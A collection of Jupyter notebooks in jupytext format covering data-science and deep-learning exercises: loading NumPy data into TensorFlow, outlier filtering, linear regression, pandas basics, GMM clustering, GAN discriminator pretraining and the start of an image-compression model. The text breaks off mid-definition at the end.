href="https://github.com/tensorflow/docs-l10n/blob/master/site/ja/tutorials/load_data/numpy.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png">View source on GitHub</a></td> # <td><a href="https://storage.googleapis.com/tensorflow_docs/docs-l10n/site/ja/tutorials/load_data/numpy.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png">Download notebook</a></td> # </table> # + [markdown] id="-0tqX8qkXZEj" # このチュートリアルでは、NumPy 配列から `tf.data.Dataset` にデータを読み込む例を示します。 # # この例では、MNIST データセットを 
`.npz` ファイルから読み込みますが、 NumPy 配列がどこに入っているかは重要ではありません。 # # + [markdown] id="-Ze5IBx9clLB" # ## 設定 # + id="k6J3JzK5NxQ6" import numpy as np import tensorflow as tf # + [markdown] id="G0yWiN8-cpDb" # ### `.npz` ファイルからのロード # + id="GLHNrFM6RWoM" DATA_URL = 'https://storage.googleapis.com/tensorflow/tf-keras-datasets/mnist.npz' path = tf.keras.utils.get_file('mnist.npz', DATA_URL) with np.load(path) as data: train_examples = data['x_train'] train_labels = data['y_train'] test_examples = data['x_test'] test_labels = data['y_test'] # + [markdown] id="cCeCkvrDgCMM" # ## `tf.data.Dataset` を使って NumPy 配列をロード # + [markdown] id="tslB0tJPgB-2" # サンプルの配列と対応するラベルの配列があるとします。 `tf.data.Dataset.from_tensor_slices` にこれら2つの配列をタプルとして入力し、`tf.data.Dataset` を作成します。 # + id="QN_8wwc5R7Qm" train_dataset = tf.data.Dataset.from_tensor_slices((train_examples, train_labels)) test_dataset = tf.data.Dataset.from_tensor_slices((test_examples, test_labels)) # + [markdown] id="6Rco85bbkDfN" # ## データセットの使用 # + [markdown] id="0dvl1uUukc4K" # ### データセットのシャッフルとバッチ化 # + id="GTXdRMPcSXZj" BATCH_SIZE = 64 SHUFFLE_BUFFER_SIZE = 100 train_dataset = train_dataset.shuffle(SHUFFLE_BUFFER_SIZE).batch(BATCH_SIZE) test_dataset = test_dataset.batch(BATCH_SIZE) # + [markdown] id="w69Jl8k6lilg" # ### モデルの構築と訓練 # + id="Uhxr8py4DkDN" model = tf.keras.Sequential([ tf.keras.layers.Flatten(input_shape=(28, 28)), tf.keras.layers.Dense(128, activation='relu'), tf.keras.layers.Dense(10) ]) model.compile(optimizer=tf.keras.optimizers.RMSprop(), loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), metrics=['sparse_categorical_accuracy']) # + id="XLDzlPGgOHBx" model.fit(train_dataset, epochs=10) # + id="2q82yN8mmKIE" model.evaluate(test_dataset)
site/ja/tutorials/load_data/numpy.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

import pandas as pd
import numpy as np

# Load the weight data set.
df = pd.read_csv("weight.csv")
df

# Drop the non-numeric Gender column so every remaining column can be
# screened for outliers numerically.
df = df.drop("Gender", axis=1)
df

# Boxplot of the raw data: points beyond the whiskers are outlier candidates.
df.boxplot()

from scipy import stats

# Method 1 — z-score filtering: keep only rows whose every column lies
# within 3 standard deviations of that column's mean.
z = np.abs(stats.zscore(df))
z

df1 = df.copy()
df1 = df1[(z < 3).all(axis=1)]
df1

df1.boxplot()

# Method 2 — IQR filtering: keep only rows that fall inside
# [Q1 - 1.5*IQR, Q3 + 1.5*IQR] for every column.
df2 = df.copy()
q1 = df2.quantile(0.25)
q3 = df2.quantile(0.75)
IQR = q3 - q1
df2_new = df2[((df2 >= q1 - 1.5 * IQR) & (df2 <= q3 + 1.5 * IQR)).all(axis=1)]

df2_new.boxplot()

df2_new
2.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 2
#     language: python
#     name: python2
# ---

# # Machine Learning Exercise 1 - Linear Regression

# This notebook covers a Python-based solution for the first programming exercise of the machine learning class on Coursera.  Please refer to the [exercise text](https://github.com/jdwittenauer/ipython-notebooks/blob/master/exercises/ML/ex1.pdf) for detailed descriptions and equations.
#
# In this exercise we'll implement simple linear regression using gradient descent and apply it to an example problem.  We'll also extend our implementation to handle multiple variables and apply it to a slightly more difficult example.

# ## Linear regression with one variable

# In the first part of the exercise, we're tasked with implementing linear regression with one variable to predict profits for a food truck.  Suppose you are the CEO of a restaurant franchise and are considering different cities for opening a new outlet.  The chain already has trucks in various cities and you have data for profits and populations from the cities.

# Let's start by importing some libraries and examining the data.

import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# %matplotlib inline

# Column 0 is a city's population, column 1 the food truck's profit there.
data = pd.read_csv('mlex1.csv', header=None, names=['Population', 'Profit'])
data.head()

data.describe()

# Let's plot it to get a better idea of what the data looks like.

plt.scatter(data['Population'], data['Profit'])

# That's it!  Thanks for reading.  In Exercise 2 we'll take a look at logistic regression for classification problems.
public/forkable/linear-regression.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # name: python3 # --- # + [markdown] id="view-in-github" colab_type="text" # <a href="https://colab.research.google.com/github/aryadeo/pandas/blob/master/pandas.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a> # + [markdown] id="oWp2L0uvrzK0" colab_type="text" # #Basics of Pandas # ![Pandas Logo](https://drive.google.com/uc?id=1fn6w_q1O1jvFWQB6JlDQVKa6KG7_BG5A) # + [markdown] id="nMQemGcautwr" colab_type="text" # Date: 12/11/2019 # # pandas has two primary data structure. # 1. Series(for 1D data) # 2. DataFrame(for 2D data) # # Data Processing can be done in three ways. # 1. Data munging and cleaning # 2. Analyzing and modelling the data # 3. Organizing for sulitable ploting and visualization # + id="4TKcZIJqpuaJ" colab_type="code" colab={} # !pip install pandas # + id="4GF8fVx_u-UK" colab_type="code" colab={} import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns sns.set() # + [markdown] id="7zq83tLTwOxL" colab_type="text" # #Data Structure # # + [markdown] id="dOuBgmNNxoTK" colab_type="text" # ##Series-1D # # + [markdown] id="B88kpMmAYMK9" colab_type="text" # A series can be buit from # # # * np array # * dictionary # * scalar # + id="eTmXWCsqzQZl" colab_type="code" outputId="323a14b1-1b97-4cbb-95df-57fc1a13e2f8" colab={"base_uri": "https://localhost:8080/", "height": 212} #series created with auto indexing s_test_1=pd.Series(np.random.rand(10)) s_test_1 # + id="-ojFfbi6wB99" colab_type="code" outputId="66a246ac-81b8-488a-8e93-21166c297ed1" colab={"base_uri": "https://localhost:8080/", "height": 212} #series from numpy with defined indices s_test_2=pd.Series(np.random.randn(10), index=list('ABCDEFGHIJ')) s_test_2 # + id="lh_raQRpx-KA" colab_type="code" 
outputId="952ae996-100b-41c6-8b9a-cce7985b92ea" colab={"base_uri": "https://localhost:8080/", "height": 123} #series from scalar with defined indices s_test_3=pd.Series(55.55,index=[m for m in range(5)]) s_test_3 # + id="3iU_KpZY0QZF" colab_type="code" outputId="02d46075-b90e-45bd-836a-e72bbb2248a3" colab={"base_uri": "https://localhost:8080/", "height": 70} #Series in dict form s_test_4=pd.Series({'a':1,'b':2}) s_test_4 # + [markdown] id="UgRhPrSE1rFl" colab_type="text" # operations in a series # # + id="RqtCQwL81H9t" colab_type="code" outputId="736604ee-9779-4502-f729-454eeee53d6b" colab={"base_uri": "https://localhost:8080/", "height": 70} print(s_test_1.index) print(s_test_2.index) print(s_test_3.index) #it can be seen that auto indexing and defined indices are printed in different ways. # + id="_ZOHEKcq2TeM" colab_type="code" outputId="76694d81-bf94-4323-e477-acf120b6cc36" colab={"base_uri": "https://localhost:8080/", "height": 621} #series is similar to nD array/numpy array print(s_test_1[0]) print(s_test_1[2:]) print(s_test_1[:5]) print(s_test_1[:]) print(s_test_1[s_test_1 > s_test_1.mean()]) # + id="D9J8V9Xm2yDe" colab_type="code" outputId="d862fc07-5838-49aa-cac0-2f4f7394f403" colab={"base_uri": "https://localhost:8080/", "height": 34} #to know the datatype of a series s_test_1.dtype # + id="hJE8q9Sp3MZ9" colab_type="code" outputId="96e8e687-5c8a-4a94-cf37-112844d1314c" colab={"base_uri": "https://localhost:8080/", "height": 52} #converting series to array----should be approached everytime s_test_1.to_numpy() # + id="ECD3EMIk5PcO" colab_type="code" outputId="e601e27c-6ebd-4a1f-877d-58dd211b287b" colab={"base_uri": "https://localhost:8080/", "height": 123} #alternative way to get the array backing the series s_test_1.array # + id="XOW5Gdf68bdR" colab_type="code" outputId="43679dc3-b7b7-488d-8f22-7ae9435d0faa" colab={"base_uri": "https://localhost:8080/", "height": 212} s_test_1+s_test_1 # + id="oyDNPs1G8foA" colab_type="code" 
outputId="f696329a-fdbe-41d8-bd02-2525384d395e" colab={"base_uri": "https://localhost:8080/", "height": 212} np.exp(s_test_1) # + id="PdmnfdPE5uzv" colab_type="code" outputId="7624ec8e-6cf9-4f05-f422-adbfcb3cc91d" colab={"base_uri": "https://localhost:8080/", "height": 105} #dictionary operation in series print(s_test_2['B']) print(s_test_2['C']) print('K'in s_test_2) print('F'in s_test_2) print(s_test_2['D']) # + id="_9ZGpdnm6FCO" colab_type="code" colab={} #giving a name to the series s_test_1.name='XYZ' # + id="1VvwzPXdDF5I" colab_type="code" outputId="36e7bcda-3407-4ba7-b158-a00998ef1a01" colab={"base_uri": "https://localhost:8080/", "height": 34} print(s_test_1.name) # + id="L82Z6NhEDJzR" colab_type="code" colab={} s_test_1_new=s_test_1.rename('ABC') # + id="9tA4TBldEDUy" colab_type="code" outputId="3c6575e0-7915-4b59-d98b-153f0449cbaa" colab={"base_uri": "https://localhost:8080/", "height": 212} s_test_1_new # + id="qq67goPCEPzz" colab_type="code" outputId="bc140033-de0d-44fe-a88b-2f6962a21aa6" colab={"base_uri": "https://localhost:8080/", "height": 212} s_test_1 # + [markdown] id="FZ4w4DqlMObf" colab_type="text" # ##Data Frame # + [markdown] id="YobKCymwKrx_" colab_type="text" # Data Frames are 2D data structure with columns are f different/same datatypes. # It takes data in the form of dictionary/ array of numbers/ series/ another data frame. # + [markdown] id="6PRc2G1mY6V3" colab_type="text" # ###From dict of series # + id="25kSS7QfEo9j" colab_type="code" outputId="4dc429d3-b0aa-4945-efae-c424fb751b4c" colab={"base_uri": "https://localhost:8080/", "height": 283} #the dataframe creates NaN for indices not defined in a series. test_data={'one': pd.Series([10.,9,3,2],index=['a','b','c','d']), 'two':pd.Series(np.random.rand(10),index=[m for m in range(10)])} df_test=pd.DataFrame(test_data) print(df_test) #here you can see that for a,b,c,d indices the second column is NaN and for remaning indices the first column is showing NaN. 
# + id="OsdjaFfQs3fQ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 212} outputId="c1e05e33-fc5e-4159-a2c7-34d3b5a472d6" test_data_1={'A': pd.Series(np.random.rand(10),index=[m for m in range(10)]), 'B': pd.Series([1,2,3,4,5,6,7,8,9,10])} df_test_1=pd.DataFrame(test_data_1) print(df_test_1) # + [markdown] id="KyazonQSZKZV" colab_type="text" # ###From dict of array # + id="sMSu6BPDNqIP" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 123} outputId="6b296c68-5247-4aad-8fe2-d621e46e7824" test_data_2={'column_1':[11.,22.,33.,44.,55.], 'column_2':[1.,2.,3.,4.,5.]} df_test_2=pd.DataFrame(test_data_2) print(df_test_2) # + id="uiVL7vOFPP30" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 197} outputId="61b570ec-06af-415b-e0a1-8983317926f4" #this data frame has no index. We can inser index to every row. pd.DataFrame(df_test_2,index=['a','b','c','d','e']) #Here it is searching for the given index in an already stored dataframe df_test_2 # + id="Gw4CotWbQDDD" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 167} outputId="863b315c-ff60-4c8f-9582-718f80d20b82" #Now lets check the same external indexing by without storing a dataframe into a variable. d = {'one': [1., 2., 3., 4.], 'two': [4, 30, 2, 1]} pd.DataFrame(d) # + id="DozlYretQ23d" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 167} outputId="1a3928cd-9073-4de8-e9e3-61073d3ab255" pd.DataFrame(d, index=['a', 'b', 'c', 'd']) #it can be seen that as the dataframe is not stored to a variable, it index names are getting changed. 
# + [markdown] id="D9g118YvZPil" colab_type="text" # ###From list of dicts # + id="NKYnjK3tQ7Ld" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 107} outputId="2d8267d1-4608-458b-813b-0385e46c3f9e" test_list=[{'one':1,'two':2,'three':3},{'a':4,'b':5,'one':10}] pd.DataFrame(test_list) # + [markdown] id="R3gojoVRlZsC" colab_type="text" # ###other operations # + id="ZSpT_f2LZ9Sd" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 70} outputId="712666c8-74df-4962-dce7-961552f61463" #adding index to te dataframe df_test_3=pd.DataFrame(test_list,index=['first set','second set']) print(df_test_3) # + id="PlyZJgF3afJc" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 107} outputId="8bd0ff74-93eb-4c26-ace3-097997392418" #to extract a particular column pd.DataFrame(test_list,columns=['one','two']) # + id="8QSxSiuwa4qN" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="79c1a8f6-703b-44c1-93c6-380df2e72eec" #extracting a particular index and columns in a dataframe. print(df_test_3[:1]['one']) # + id="mfyXaC2AbH5z" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 70} outputId="1bdfd0c0-988c-4e0f-f232-0e54efc735d0" #deleting and popping up del df_test_3['one'] print(df_test_3) # + id="nHedxzyFmSlT" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 70} outputId="b2fca268-bcf0-4213-db0a-4ea805577a2f" #deleting and popping up df_test_3.pop('b') print(df_test_3) # + id="__DBCM3Qmw1u" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 70} outputId="ed70ea8c-2b1b-48d8-f1b4-db741adf24e8" #When inserting a scalar value, it will naturally be propagated to fill the column: df_test_3['new_column']='any scalar value' print(df_test_3) # + [markdown] id="9U1kptiQoV9F" colab_type="text" # by default new column will be inserted to the end of the dataframe. 
But by using 'insert' command we can insert a column at any position in a dataframe. # + id="CsbmmeYSniDC" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 70} outputId="c1579652-9016-4710-ef1d-7f8fc9231bad" df_test_3['n_c_1']=df_test_3['two'] print(df_test_3) #here we are adding a new column to the existing dataframe with values copied from the 'two' column. # + id="_Pux1IvOo1B0" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 70} outputId="a4272f9d-5097-4991-ad18-239a922df429" df_test_3.insert(3,'inserted_column',[300,400]) print(df_test_3) # + [markdown] id="zSxHNC-tyuv1" colab_type="text" # ###creating a dataframe from a date range # # + id="76VBpSPUys69" colab_type="code" colab={} test_data_3=pd.date_range(start='20190101',end='20190130') df_test_4=pd.DataFrame(np.random.rand(30,4),index=test_data_3,columns=list('ABCD')) # + id="XKgeUeH3zBwd" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 567} outputId="92df614b-0154-4b62-8245-42a5200fa1db" print(df_test_4) # + [markdown] id="2IJ5m768NHO2" colab_type="text" # ###observation # + id="1Tc7zAOhzEod" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 197} outputId="d2283a4d-3b71-4ad6-ab61-61786e99cc49" df_test_4.head() # + id="v7jtWKaI8a2e" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 197} outputId="f344b262-2f36-4ebf-8ec9-b691678ca361" df_test_4.tail() # + id="QvWhrXFX8jDd" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 176} outputId="344d24cd-b391-4f4d-f102-33ee03410b8b" df_test_4.index # + id="E9zZvg1o8uzd" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="623a3b48-e045-4af7-9038-81d71eee474d" df_test_4.columns # + id="UOwyLOk99EEt" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 287} outputId="dd7d3663-e0f6-465e-a615-759e288acd05" df_test_4.describe()#### million dolar command # + 
id="wDaKifEN9rGQ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 204} outputId="94477bfc-bd5b-4f6e-f46d-d2eb33377c63" #transposing the dataframe df_test_4.T # + id="ZljkaqhvAWH9" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="6641fa88-8aed-4bb1-b24a-cf210129699e" df_test_4['A'].mean() # + [markdown] id="Mu2GRNt3HfSG" colab_type="text" # ###Bolean operationa nd grouping # + id="uB11R3FuE-9d" colab_type="code" colab={} df_test_4 [df_test_4.A > 0.5] # + id="j7moz2_2GGFt" colab_type="code" colab={} df_test_4['boolean']=df_test_4['A']>0.5 # + id="nfyBGSYpGops" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 947} outputId="5c57d0cb-e62b-43a9-99cc-e88e4bbfefff" df_test_4 # + id="YCHAtpEPHai8" colab_type="code" colab={} g=df_test_4.groupby(['boolean']) # + id="ga8MQvKGHsM9" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 621} outputId="c288cccd-7fc0-4308-f8b9-732ef859b6c9" #here there are two objects #1. key #2. <DataFrame_name>_key for key,df_test_4_key in g: print(key) print(df_test_4_key)
pandas.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# # Watch Me Code 1: Pandas Basics
#
# - Series
# - DataFrame
# - Select columns, select rows with Boolean indexing
#

import pandas as pd

# A Series is a labelled 1-D array; its `name` becomes the column header
# when the Series joins a DataFrame.
fruits = pd.Series(['Apple', 'Banana', 'Cherry', 'Orange', 'Pear'], name="Fruit")
fruits

qtys = pd.Series([5, 7, 2, 9, 4])
qtys

# A DataFrame built from a dictionary of Series / lists.
inventory = pd.DataFrame({
    'Fruit': fruits,
    'Qty': qtys,
    'Price': [2.99, 1.99, 3.99, 2.99, 1.49]
})
inventory

# Selecting with a bare column name returns a Series...
inventory['Fruit']

# ...while a one-element list of column names returns a DataFrame.
inventory[['Fruit']]

# A list with two column names selects both as a DataFrame.
inventory[['Fruit', 'Price']]

# Comparing a column yields a Boolean Series (a "mask").
inventory['Qty'] > 5

# Applying the mask to the DataFrame keeps only the rows where it is True.
inventory[inventory['Qty'] > 5]

# Column selection and row filtering can be chained in one expression...
fruit_and_price_over5 = inventory[['Fruit', 'Price']][inventory['Qty'] > 5]
fruit_and_price_over5

# ...or, more readably, split into two named steps that produce the same result.
large_qty = inventory[inventory['Qty'] > 5]
fruit_and_price_over5 = large_qty[['Fruit', 'Price']]
fruit_and_price_over5
lessons/12-pandas/WMC1-Pandas-Basics.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# # 4: Linearly Inseparable Datasets
#
# ## 4.1: The Non-Convex Regions
#
# ### Non-Convex Regions
#
# * What are non-convex regions?
#
# ### Linearly Inseparable Regions
#
# * What are linearly inseparable regions?
#
# Here is an image of linearly inseparable, non-convex regions that we would like to identify by clustering.
#
# Let us look at just the data points:
#
# <img src='https://s3.amazonaws.com/rfjh/media/CKEditorImages/2017/06/19/4_almonds.png'/>
#
# <br/>
# ## Exercise:
#
# Let us now create this dataset of 4 almonds using half-moons.
#
# - Create a dataframe, moon_df with the structure given the X, y.
#
# <table border="1" cellpadding="1" cellspacing="1" style="width:500px; float: left;">
# <tbody>
# <tr>
# <td>X_0</td>
# <td>X_1</td>
# <td>y</td>
# </tr>
# <tr>
# <td>X[:,0]</td>
# <td>X[:,1]</td>
# <td>y</td>
# </tr>
# </tbody>
# </table>

# +
from matplotlib import pyplot as plt
from sklearn.datasets import make_moons
import numpy as np
import seaborn as sns
import pandas as pd

plt.rcParams['figure.figsize'] = (10.0, 8.0)  # set default size of plots
plt.rcParams['image.interpolation'] = 'nearest'
plt.rcParams['image.cmap'] = 'gray'

# Dataset dimensions: N_Samples points per half-moon, D features, K clusters.
N_Samples = 1000
D = 2
K = 4

# Two pairs of half-moons; the second pair is shifted 2.5 to the right and
# relabelled 2/3 so the full dataset has four "almond" regions.
X, y = make_moons(n_samples=2 * N_Samples, noise=0.05, shuffle=False)
x_vec, y_vec = make_moons(n_samples=2 * N_Samples, noise=0.08, shuffle=False)
x_vec[:, 0] += 2.5
y_vec += 2
X = np.concatenate((X, x_vec), axis=0)
y = np.concatenate((y, y_vec), axis=0)

moon_df = pd.DataFrame({'X_0': X[:, 0], 'X_1': X[:, 1], 'y': y})

g = sns.pairplot(x_vars="X_0", y_vars="X_1", hue="y", data=moon_df)
g.fig.set_size_inches(14, 6)
sns.despine()
# -

# <br/><br/><br/>
# ## 4.2: Linearly Inseparable Datasets
#
# Applying k-means to the dataset: We see that the k-means failed. Let us now try GMMs
#
# <img src='https://s3.amazonaws.com/rfjh/media/CKEditorImages/2017/06/19/k-means-moons.png'/>
#
# <br/>
# ## Exercise:
#
# - Apply GMMs on the dataset and visualize the graph, g.
# - Assign the cluster assignments of each data point to the gmm_clus column in the moon_df dataframe.
#

# +
import matplotlib as mpl
from matplotlib import pyplot as plt
from sklearn.datasets import make_moons
import numpy as np
import seaborn as sns
import pandas as pd
from sklearn import datasets
from sklearn import mixture
from sklearn.mixture import GaussianMixture

# Generate the half moon data-set (4-halfmoons), as in section 4.1.
N_Samples = 1000
X, y = make_moons(n_samples=2 * N_Samples, noise=0.05, shuffle=False)
x_vec, y_vec = make_moons(n_samples=2 * N_Samples, noise=0.08, shuffle=False)
x_vec[:, 0] += 2.5
y_vec += 2
X = np.concatenate((X, x_vec), axis=0)
y = np.concatenate((y, y_vec), axis=0)

# Visualizing using the seaborn library.
moon_df = pd.DataFrame({'X_0': X[:, 0], 'X_1': X[:, 1], 'y': y})

# Fit a 4-component spherical GMM and store the hard cluster assignments.
mixture_model = GaussianMixture(n_components=4, covariance_type='spherical')
mixture_model.fit(X)
moon_df['gmm_clus'] = mixture_model.predict(X)

# Plot the clusters
g = sns.pairplot(x_vars="X_0", y_vars="X_1", hue="gmm_clus", data=moon_df)
g.fig.set_size_inches(14, 6)
sns.despine()
# BUGFIX: seaborn does not re-export pyplot, so `sns.plt.show()` raises
# AttributeError on any modern seaborn release. Call pyplot directly.
plt.show()
4.0-linearly-inseparable-datasets_with_answers.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # name: python3 # --- # + [markdown] id="view-in-github" colab_type="text" # <a href="https://colab.research.google.com/github/pvrancx/torch_isr/blob/master/colabs/pretrain_discriminator.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a> # + [markdown] id="rCdpwPag9iE_" colab_type="text" # Supervised pretraining of discriminator before use in GAN training # + id="6ozAJqcNeRrx" colab_type="code" colab={} # ! pip install pytorch-lightning # + id="qZc_XnWHeUGk" colab_type="code" colab={} % cd "/content" # ! git clone "https://github.com/pvrancx/torch_isr.git" % cd "/content/torch_isr" # ! git pull # + id="jBvRDqxJeXoa" colab_type="code" colab={} from pytorch_lightning import Trainer import torch from torch.utils.data import random_split, DataLoader from torchvision.transforms import transforms from pytorch_lightning.callbacks import ModelCheckpoint from pytorch_lightning.loggers import TensorBoardLogger from isr.datasets.bsd import load_bsd300 from isr.datasets.transforms import ChannelSelect from isr.datasets.isr import IsrDataset from isr.datasets.gan import DiscriminatorDataset from isr.models.srcnn import SrCnn, SubPixelSrCnn from isr.models.srresnet import SrResNet from isr.models.srgan import SrGan, Discriminator from super_resolve import super_resolve_ycbcr, super_resolve_rgb import os from PIL import Image from argparse import ArgumentParser import matplotlib.pyplot as plt # %matplotlib inline # + [markdown] id="L9gjhksa8VOj" colab_type="text" # Create ISR dataset # + id="4FexM12se7Wm" colab_type="code" colab={} bsd300_train = load_bsd300('../data', split='train', image_mode='RGB') train_transforms = transforms.Compose([ transforms.RandomHorizontalFlip(), transforms.RandomRotation(15), ]) isr_data = IsrDataset( 
bsd300_train, output_size=96, scale_factor=4, deterministic=False, base_image_transform=train_transforms, transform=transforms.ToTensor(), target_transform=transforms.ToTensor() ) # + [markdown] id="405cgEQi8L2m" colab_type="text" # Load trained ISR model and create dataset of real and fake images # + id="kZzZsGpigfLq" colab_type="code" colab={} generator = SrResNet.load_from_checkpoint('/content/torch_isr/trained_models/srresnet4x.ckpt') dataset = DiscriminatorDataset(isr_data, generator) # + id="G4E5NO2ijODx" colab_type="code" colab={} n_train = int(len(dataset) * 0.8) split = [n_train, len(dataset) - n_train] train_data, val_data = random_split(dataset, split) train_loader = DataLoader(train_data, shuffle=True, batch_size=32, num_workers=2) val_loader = DataLoader(val_data, shuffle=False, batch_size=32, num_workers=2) # + id="YqfsaSRkgoaT" colab_type="code" colab={} base_dir = '/content/discriminator' chkptdir_dir = os.path.join(base_dir, 'checkpoints') # !mkdir -p chkptdir_dir checkpoint_callback = ModelCheckpoint( filepath=chkptdir_dir, save_top_k=3, verbose=False, monitor='val_loss', mode='min' ) logger = TensorBoardLogger(base_dir, name="tb_logs") # + [markdown] id="CbHxXgYL9-rB" colab_type="text" # Create binary classifier # + id="FYVGjgEhijPD" colab_type="code" colab={} # get default arg settings parser = ArgumentParser() parser = Trainer.add_argparse_args(parser) parser = Discriminator.add_model_specific_args(parser) hparams = parser.parse_args([]) # customize settings hparams.img_shape = (96, 96) hparams.lr = 1e-4 hparams.in_channels = 3 hparams.max_epochs = 200 model = Discriminator(hparams) # + id="-K_qvYbjjCYF" colab_type="code" colab={} # %reload_ext tensorboard # %tensorboard --logdir "$base_dir" # + [markdown] id="uTrlqMzy83cP" colab_type="text" # Train discriminator as standard classifier to distinguish between real and fake images # + id="PuXYfiF3jE0W" colab_type="code" colab={} trainer = Trainer( max_epochs=200, logger=logger, 
log_gpu_memory='min_max', gpus=1, checkpoint_callback=checkpoint_callback ) trainer.fit( model, train_dataloader=train_loader, val_dataloaders=val_loader, ) # + [markdown] id="qX21bW7J9GbA" colab_type="text" # Try discriminator # + id="d6Fbtkzh4iRx" colab_type="code" colab={} img_lr, img_hr = isr_data[0] # + [markdown] id="01PJIO0P9KQk" colab_type="text" # Real image: # + id="Z9qbAE6P57Yz" colab_type="code" colab={} plt.imshow(img_hr.squeeze(0).permute([1,2,0])) # + [markdown] id="dm-0rHlz9MsS" colab_type="text" # Generated image: # + id="D2SCt-J86ZM3" colab_type="code" colab={} fake_img = generator(img_lr.unsqueeze(0)).detach() # + id="KoqLQGNg7BTG" colab_type="code" colab={} plt.imshow(fake_img.squeeze(0).permute([1,2,0])) # + [markdown] id="P-9INZhU9PBD" colab_type="text" # Test discriminator on both images # + id="i6y5QqrS7GHC" colab_type="code" colab={} model(img_hr.unsqueeze(0)) # + id="JaXhHa1O7SPG" colab_type="code" colab={} model(fake_img)
colabs/pretrain_discriminator.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + _uuid="676f62ff4ce2df1e2108b1ba11f1c68cb55a245d" colab={} colab_type="code" id="xmSic0K37La8" ''' v0.1 This model preoduced a MSSSIM score of 0.86 on validation. In this we attempt to improve the model. ''' # + _uuid="08d96b04a7dbb3d82783b348aa0735ffd3e4ed41" colab={} colab_type="code" id="5GH93QhR7X1F" import os import cv2 import torch import numpy as np import pandas as pd from PIL import Image import torch.nn as nn from zipfile import ZipFile import torch.nn.functional as F from torchvision import transforms import torchvision.transforms.functional as TF import random from torch.utils.data import Dataset, DataLoader from torch.utils.data.sampler import SubsetRandomSampler import matplotlib.pyplot as plt import time # Ignore warnings import warnings warnings.filterwarnings("ignore") # from pydrive.auth import GoogleAuth # from pydrive.drive import GoogleDrive # from google.colab import auth # from oauth2client.client import GoogleCredentials # %matplotlib inline import torchvision import zipfile from IPython import display from torch.autograd import Function # !git clone https://github.com/jorge-pessoa/pytorch-msssim os.chdir('pytorch-msssim') # !python setup.py install os.chdir('../') import pytorch_msssim # + _uuid="911837df1b14b04e195bb7388a2f80f8a9f63a96" colab={} colab_type="code" id="XmPaI58b8pVH" class imgDataset(Dataset): def __init__(self,path = '../input',indices=None): self.files = [] for r, d, f in os.walk(path): for file in f: if '.png' in file: self.files.append(os.path.join(r, file)) if indices!=None: files2 = self.files self.files = [] for i in range(len(files2)): self.files.append(files2[i]) def __getitem__(self,idx): img = Image.open(self.files[idx]) return self.transform(img) def __len__(self): return len(self.files) def 
transform(self,img): if random.random()>0.3: angle = random.randint(-60, 60) img = TF.rotate(img,angle) width, height = img.size dw = 32 - (width%32) dh = 32 - (height%32) img = TF.pad(img,(dw,dh,0,0)) return TF.to_tensor(img) # + _uuid="3470fe9cbd73d8a07ff7231b36af75a57f8f9d8d" class SignFunction(Function): def __init__(self): super(SignFunction,self).__init__() @staticmethod def forward(ctx,input, is_training=True): if is_training: prob = input.new(input.size()).uniform_() x = input.clone() x[(1 - input) / 2 <= prob] = 1 x[(1 - input) / 2 > prob] = -1 return x else: return input.sign() @staticmethod def backward(ctx, grad_output): return grad_output, None class Sign(nn.Module): def __init__(self): super(Sign, self).__init__() def forward(self,x): return SignFunction.apply(x, self.training) class Binarizer(nn.Module): def __init__(self,in_channels,out_channels): super(Binarizer,self).__init__() self.sign = Sign() self.conv1 = nn.Conv2d(in_channels, out_channels,kernel_size=1,bias=False) def forward(self,x): x = 